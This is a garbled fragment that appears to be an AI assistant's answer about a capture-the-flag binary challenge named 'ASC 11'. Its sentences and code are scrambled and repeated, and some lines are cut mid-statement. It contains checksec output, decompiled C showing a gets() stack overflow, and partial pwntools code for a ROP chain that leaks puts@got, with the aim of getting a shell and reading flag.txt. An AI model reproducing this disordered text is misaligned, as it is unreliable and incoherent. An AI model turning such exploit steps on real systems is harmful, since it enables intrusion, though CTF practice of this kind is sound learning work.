11 ~repack~ — Asc

./asc11 It prints "Input: " , waits for input, then exits. Open in Ghidra/IDA. The main function:

file asc11 checksec asc11 Output (example): asc 11

p.interactive() Run exploit → shell → cat flag.txt . If you provide the actual binary and server info , I can tailor the exact exploit, offsets, and libc version. Does this match your ASC 11 challenge? If you provide the actual binary and server

Here’s a (likely referring to the 11th Allied Security CTF challenge, or a similar “ASC” CTF / wargame). p = process('

p = process('./asc11') offset = 40 ROP to leak puts@got rop = ROP(elf) rop.puts(elf.got['puts']) rop.call(elf.symbols['main'])

asc11: ELF 64-bit, dynamically linked, not stripped Arch: amd64 RELRO: Partial Stack: No canary found NX: Enabled PIE: Disabled Run it to see behavior:

void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable